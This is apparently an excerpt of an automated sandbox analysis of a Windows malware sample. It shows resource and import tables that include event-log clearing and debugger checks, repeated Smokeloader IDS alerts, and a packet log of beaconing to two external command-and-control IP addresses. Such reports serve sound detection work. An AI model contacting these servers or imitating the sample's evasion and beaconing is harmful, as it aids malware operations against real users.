                                                                RT_ICON0x27343580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.37672811059907835
                                                                RT_ICON0x2734a200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.3786127167630058
                                                                RT_ICON0x2734f880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.25778008298755184
                                                                RT_ICON0x27375300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.275328330206379
                                                                RT_ICON0x27385d80x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.28647540983606556
                                                                RT_ICON0x2738f600x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.32358156028368795
                                                                RT_STRING0x27395f80xccdata0.553921568627451
                                                                RT_STRING0x27396c80x50cdata0.4473684210526316
                                                                RT_STRING0x2739bd80x3aadata0.4616204690831556
                                                                RT_STRING0x2739f880x52cdata0.4516616314199396
                                                                RT_STRING0x273a4b80x652data0.4338689740420272
                                                                RT_STRING0x273ab100x798data0.41975308641975306
                                                                RT_STRING0x273b2a80x84cdata0.4129001883239171
                                                                RT_STRING0x273baf80x666data0.4340659340659341
                                                                RT_STRING0x273c1600x7f6data0.4210009813542689
                                                                RT_STRING0x273c9580x758data0.41914893617021276
                                                                RT_STRING0x273d0b00x78cdata0.4254658385093168
                                                                RT_STRING0x273d8400x666data0.4340659340659341
                                                                RT_STRING0x273dea80x69edata0.4268004722550177
                                                                RT_STRING0x273e5480x54cdata0.44026548672566373
                                                                RT_STRING0x273ea980x26data0.5526315789473685
                                                                RT_GROUP_ICON0x272e9200x68dataTurkishTurkey0.7019230769230769
                                                                RT_GROUP_ICON0x27393c80x76dataTurkishTurkey0.6779661016949152
                                                                RT_GROUP_ICON0x27291900x76dataTurkishTurkey0.6610169491525424
                                                                RT_GROUP_ICON0x2732ba00x68dataTurkishTurkey0.7211538461538461
                                                                RT_VERSION0x27394400x1b4data0.5848623853211009
                                                                DLLImport
                                                                KERNEL32.dllGetConsoleAliasExesLengthA, DeleteVolumeMountPointA, OpenJobObjectA, ReadConsoleA, InterlockedDecrement, GlobalSize, SetDefaultCommConfigW, InterlockedCompareExchange, GetComputerNameW, SetEvent, GetNumaAvailableMemoryNode, FreeEnvironmentStringsA, GetModuleHandleW, GetConsoleAliasesLengthA, SetCommState, GetConsoleWindow, ReadConsoleOutputW, GetVersionExW, GetStringTypeExW, HeapDestroy, GetFileAttributesA, GetTimeFormatW, SearchPathW, GetBinaryTypeA, DisconnectNamedPipe, LCMapStringA, GetLastError, GetProcAddress, MoveFileW, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, LocalAlloc, WritePrivateProfileStringA, QueryDosDeviceW, GetModuleFileNameA, BuildCommDCBA, FatalAppExitA, GetShortPathNameW, SetCalendarInfoA, FindAtomW, SetConsoleMode, PulseEvent, HeapAlloc, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, WriteFile, GetStdHandle, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize
                                                                ADVAPI32.dllClearEventLogW
                                                                Language of compilation systemCountry where language is spokenMap
                                                                TurkishTurkey
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-12T23:27:36.506031+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449736190.224.203.3780TCP
                                                                2024-10-12T23:27:37.897672+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449737190.224.203.3780TCP
                                                                2024-10-12T23:27:39.375920+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449738190.224.203.3780TCP
                                                                2024-10-12T23:27:40.762602+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449739190.224.203.3780TCP
                                                                2024-10-12T23:27:42.132225+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449740190.224.203.3780TCP
                                                                2024-10-12T23:27:43.504764+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449741190.224.203.3780TCP
                                                                2024-10-12T23:27:44.877319+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449742190.224.203.3780TCP
                                                                2024-10-12T23:27:46.243719+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449743190.224.203.3780TCP
                                                                2024-10-12T23:27:47.659001+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449744190.224.203.3780TCP
                                                                2024-10-12T23:27:49.040046+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449745190.224.203.3780TCP
                                                                2024-10-12T23:27:50.403081+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449746190.224.203.3780TCP
                                                                2024-10-12T23:27:51.781560+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449747190.224.203.3780TCP
                                                                2024-10-12T23:27:53.491806+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449748190.224.203.3780TCP
                                                                2024-10-12T23:27:54.872226+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449749190.224.203.3780TCP
                                                                2024-10-12T23:27:56.260005+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449750190.224.203.3780TCP
                                                                2024-10-12T23:27:57.931307+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449751190.224.203.3780TCP
                                                                2024-10-12T23:27:59.334639+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449752190.224.203.3780TCP
                                                                2024-10-12T23:28:00.783631+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449753190.224.203.3780TCP
                                                                2024-10-12T23:28:02.177397+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449760190.224.203.3780TCP
                                                                2024-10-12T23:28:03.568585+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449772190.224.203.3780TCP
                                                                2024-10-12T23:28:04.965664+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449778190.224.203.3780TCP
                                                                2024-10-12T23:28:06.355448+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449789190.224.203.3780TCP
                                                                2024-10-12T23:28:07.767337+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449800190.224.203.3780TCP
                                                                2024-10-12T23:28:09.198762+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449811190.224.203.3780TCP
                                                                2024-10-12T23:28:12.186615+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449828190.224.203.3780TCP
                                                                2024-10-12T23:28:13.598657+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449839190.224.203.3780TCP
                                                                2024-10-12T23:28:14.981042+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449848190.224.203.3780TCP
                                                                2024-10-12T23:28:16.368431+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449856190.224.203.3780TCP
                                                                2024-10-12T23:28:17.790439+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449862190.224.203.3780TCP
                                                                2024-10-12T23:28:19.160968+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449873190.224.203.3780TCP
                                                                2024-10-12T23:28:20.515030+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449882190.224.203.3780TCP
                                                                2024-10-12T23:28:21.888189+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449890190.224.203.3780TCP
                                                                2024-10-12T23:28:23.273942+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449901190.224.203.3780TCP
                                                                2024-10-12T23:28:24.646829+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449908190.224.203.3780TCP
                                                                2024-10-12T23:28:26.025285+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449918190.224.203.3780TCP
                                                                2024-10-12T23:28:27.541883+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.449929190.224.203.3780TCP
                                                                2024-10-12T23:29:37.673928+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450039190.224.203.3780TCP
                                                                2024-10-12T23:29:45.033278+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450040190.224.203.3780TCP
                                                                2024-10-12T23:29:53.061102+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450041190.224.203.3780TCP
                                                                2024-10-12T23:30:03.157572+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450042190.224.203.3780TCP
                                                                2024-10-12T23:30:20.229015+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457093190.220.21.2880TCP
                                                                2024-10-12T23:30:33.637008+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457094190.220.21.2880TCP
                                                                2024-10-12T23:30:46.932059+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457095190.220.21.2880TCP
                                                                2024-10-12T23:31:01.016369+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.457096190.220.21.2880TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 12, 2024 23:27:34.815587044 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:34.820499897 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:34.822983980 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:34.823142052 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:34.826426983 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:34.827928066 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:34.831273079 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.503072023 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.505882978 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.506031036 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.510360003 CEST4973680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.513678074 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.515193939 CEST8049736190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.518656015 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.518764019 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.518877029 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.518918991 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:36.523752928 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:36.523905039 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.896641970 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.897609949 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.897671938 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.897736073 CEST4973780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.901360035 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.902534008 CEST8049737190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.906385899 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.906455040 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.906579971 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.906611919 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:37.911425114 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:37.911626101 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.375077009 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.375842094 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.375920057 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.375972986 CEST4973880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.379412889 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.381469011 CEST8049738190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.385200977 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.386837959 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.386974096 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.386974096 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:39.391892910 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:39.392430067 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.760502100 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.762372971 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.762602091 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.762602091 CEST4973980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.765214920 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.767662048 CEST8049739190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.770262957 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.770347118 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.770448923 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.770503998 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:40.775244951 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:40.775367022 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.131206036 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.132147074 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.132225037 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.132278919 CEST4974080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.135545015 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.137074947 CEST8049740190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.140360117 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.140451908 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.146588087 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.146657944 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:42.151371002 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:42.151464939 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.503515005 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.504702091 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.504764080 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.504837990 CEST4974180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.508091927 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.509987116 CEST8049741190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.513011932 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.513081074 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.513222933 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.513248920 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:43.518177986 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:43.518333912 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.876148939 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.877247095 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.877319098 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.881846905 CEST4974280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.885446072 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.886694908 CEST8049742190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.890295982 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.890367031 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.890516996 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.890553951 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:44.895330906 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:44.895437956 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.242913961 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.243643999 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.243719101 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.247036934 CEST4974380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.250013113 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.251806021 CEST8049743190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.254838943 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.254915953 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.255208969 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.255251884 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:46.259970903 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:46.260003090 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.657882929 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.658876896 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.659001112 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.659109116 CEST4974480192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.662795067 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.664122105 CEST8049744190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.667725086 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.667881012 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.668030024 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.668064117 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:47.672854900 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:47.672878981 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.038738966 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.039961100 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.040045977 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.040111065 CEST4974580192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.042783976 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.045084000 CEST8049745190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.047774076 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.047858000 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.048058987 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.048110962 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:49.053647995 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:49.053678036 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.401794910 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.402978897 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.403080940 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.403178930 CEST4974680192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.405739069 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.408060074 CEST8049746190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.410811901 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.410960913 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.411030054 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.411051989 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:50.416424036 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:50.416508913 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.780636072 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.781491995 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.781559944 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.781608105 CEST4974780192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.784224987 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.786499023 CEST8049747190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.789125919 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.789197922 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.789321899 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.789339066 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:51.794095039 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:51.794272900 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.491604090 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.491662025 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.491715908 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.491806030 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.491894960 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.491894960 CEST4974880192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.494081974 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.496835947 CEST8049748190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.499346972 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.499444008 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.499587059 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.499623060 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:53.504631996 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:53.504700899 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.871311903 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.872158051 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.872226000 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.872309923 CEST4974980192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.874515057 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.877053976 CEST8049749190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.879362106 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.879440069 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.879584074 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.879584074 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:54.884325981 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:54.884335041 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.259181023 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.259938955 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.260004997 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.260101080 CEST4975080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.264904976 CEST8049750190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.549916029 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.554954052 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.555103064 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.555217981 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.555231094 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:56.560062885 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:56.560179949 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.930603027 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.931235075 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.931307077 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.931371927 CEST4975180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.934503078 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.936312914 CEST8049751190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.939450026 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.939551115 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.939685106 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.939718008 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:57.944571972 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:57.944603920 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.333549976 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.334549904 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.334639072 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.351689100 CEST4975280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.356620073 CEST8049752190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.389647007 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.394634008 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.394723892 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.394874096 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.394901991 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:27:59.399710894 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:27:59.399797916 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:28:00.782381058 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:28:00.783540964 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:28:00.783631086 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:28:00.783667088 CEST4975380192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:28:00.786437035 CEST4976080192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:28:00.788753033 CEST8049753190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:28:00.791480064 CEST8049760190.224.203.37192.168.2.4
